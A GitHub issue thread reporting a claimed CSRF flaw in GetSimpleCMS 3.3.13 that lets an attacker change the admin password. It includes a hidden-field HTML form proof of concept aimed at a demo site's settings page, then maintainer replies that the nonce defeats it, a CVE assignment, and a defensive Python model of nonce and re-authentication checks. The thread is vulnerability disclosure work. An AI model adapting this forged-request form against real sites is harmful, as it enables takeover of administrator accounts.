
GetSimpleCMS v3.3.13 allows CSRF to change the administrator account's password in admin/settings.php #1295

Open
AutismJH opened this issue Aug 24, 2018 · 9 comments
@AutismJH commented Aug 24, 2018

GetSimpleCMS v3.3.13 allows CSRF to change the administrator account's password.
After the administrator logs in, open the PoC; the administrator account's password will be changed to 456789.
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://s1.demo.opensourcecms.com/getsimple/admin/settings.php" method="POST">
      <input type="hidden" name="nonce" value="a609cbb2d8a13520d33d5f28b1fa50027d6085cc" />
      <input type="hidden" name="sitename" value="GetSimple" />
      <input type="hidden" name="siteurl" value="https&#58;&#47;&#47;s1&#46;demo&#46;opensourcecms&#46;com&#47;getsimple&#47;" />
      <input type="hidden" name="permalink" value="" />
      <input type="hidden" name="user" value="opensourcecms" />
      <input type="hidden" name="email" value="cms&#64;gfdk&#46;org" />
      <input type="hidden" name="name" value="" />
      <input type="hidden" name="timezone" value="Europe&#47;Brussels" />
      <input type="hidden" name="lang" value="en&#95;US" />
      <input type="hidden" name="show&#95;htmleditor" value="1" />
      <input type="hidden" name="sitepwd" value="456789" />
      <input type="hidden" name="sitepwd&#95;confirm" value="456789" />
      <input type="hidden" name="submitted" value="Save&#32;Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@cnb (Contributor) commented Aug 24, 2018

You have to know the administrator's account name.
And even if you know it, you get a "CSRF detected!" error (and the password isn't changed).

@AutismJH (Author) commented

I can change the username in my PoC package, in the user section, even without your administrator's account. I can also change it.

@tablatronix (Member) commented

With the nonce...

@AutismJH (Author) commented

CSRF (cross-site request forgery): because the target site has no token/Referer restrictions, the attacker can complete the operation as a user to achieve various purposes. You can check the token's verification, or the Referer header's detection, or add a verification code. After all, there is never any harm in it.

@tablatronix (Member) commented

There already is a nonce; it's in your PoC, and it's why your PoC will always fail.

@tablatronix (Member) commented Aug 25, 2018

Refs
#1056
Oops, that's for the API.

I thought we had a milestone for CSRF referrer checking and CORS somewhere.

@fgeek commented Oct 1, 2018

CVE-2018-17103 has been assigned for this issue.

@tablatronix (Member) commented Oct 1, 2018

I am tempted to close this and ignore it; it requires privilege escalation and a nonce.

@tablatronix (Member) commented May 24, 2019

Mitigation

  • use password auth for change password
  • add secondary confirm
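As an added illustration of the two points made in this thread (the per-session nonce that makes the posted PoC fail, and the mitigation of re-authenticating with the current password before a password change), here is a small Python model of a settings handler. This is example code written for this page, not GetSimple's own code: the session layout, the `nonce_for`/`handle_settings_post` functions, the `current_pwd` form field and the sample form data are all assumptions constructed for the demonstration.

```python
import hashlib
import hmac
import os
import secrets

PBKDF2_ROUNDS = 100_000


def new_session(username, password):
    """Constructed toy server-side session for one logged-in admin (assumption)."""
    salt = os.urandom(16)
    return {
        "user": username,
        "salt": salt,
        "pwd_hash": hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS),
        # Per-session secret used to derive nonces; never sent to the browser.
        "nonce_key": secrets.token_bytes(32),
    }


def nonce_for(session, action):
    """Nonce embedded in a form for this session and action.

    An attacker's page cannot compute it without the session secret, so a value
    copied from another session (as in the posted PoC) never matches.
    """
    return hmac.new(session["nonce_key"], action.encode(), hashlib.sha256).hexdigest()


def check_password(session, candidate):
    h = hashlib.pbkdf2_hmac("sha256", candidate.encode(), session["salt"], PBKDF2_ROUNDS)
    return hmac.compare_digest(h, session["pwd_hash"])


def handle_settings_post(session, form):
    """Process a POST to the settings page. Returns (status, message)."""
    supplied = form.get("nonce", "")
    expected = nonce_for(session, "settings")
    # Constant-time comparison on bytes; reject anything that is not this session's nonce.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return ("error", "CSRF detected!")

    new_pwd = form.get("sitepwd", "")
    if new_pwd:
        if new_pwd != form.get("sitepwd_confirm", ""):
            return ("error", "passwords do not match")
        # Mitigation from the thread: a password change must be re-authenticated with
        # the current password (field name `current_pwd` is an assumption).
        if not check_password(session, form.get("current_pwd", "")):
            return ("error", "current password required to change password")
        session["salt"] = os.urandom(16)
        session["pwd_hash"] = hashlib.pbkdf2_hmac(
            "sha256", new_pwd.encode(), session["salt"], PBKDF2_ROUNDS
        )
        return ("ok", "password changed")

    return ("ok", "settings saved")


def demo():
    """Run the three cases discussed in the thread and return their statuses."""
    session = new_session("opensourcecms", "correct horse")
    base = {"sitename": "GetSimple", "user": "opensourcecms",
            "sitepwd": "456789", "sitepwd_confirm": "456789"}
    # 1. Cross-site form carrying a nonce copied from the PoC: rejected.
    forged = dict(base, nonce="a609cbb2d8a13520d33d5f28b1fa50027d6085cc")
    # 2. Correct nonce but no current password: rejected by the re-auth check.
    no_reauth = dict(base, nonce=nonce_for(session, "settings"))
    # 3. Correct nonce plus current password: accepted.
    legit = dict(no_reauth, current_pwd="correct horse")
    statuses = [handle_settings_post(session, f)[0] for f in (forged, no_reauth, legit)]
    return statuses, check_password(session, "456789")


if __name__ == "__main__":
    print(demo())
```

Even if an attacker learns the administrator's username, the first check stops the forged request, and a nonce that leaks from a stale or cached page is still not enough to change the password without the current one.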
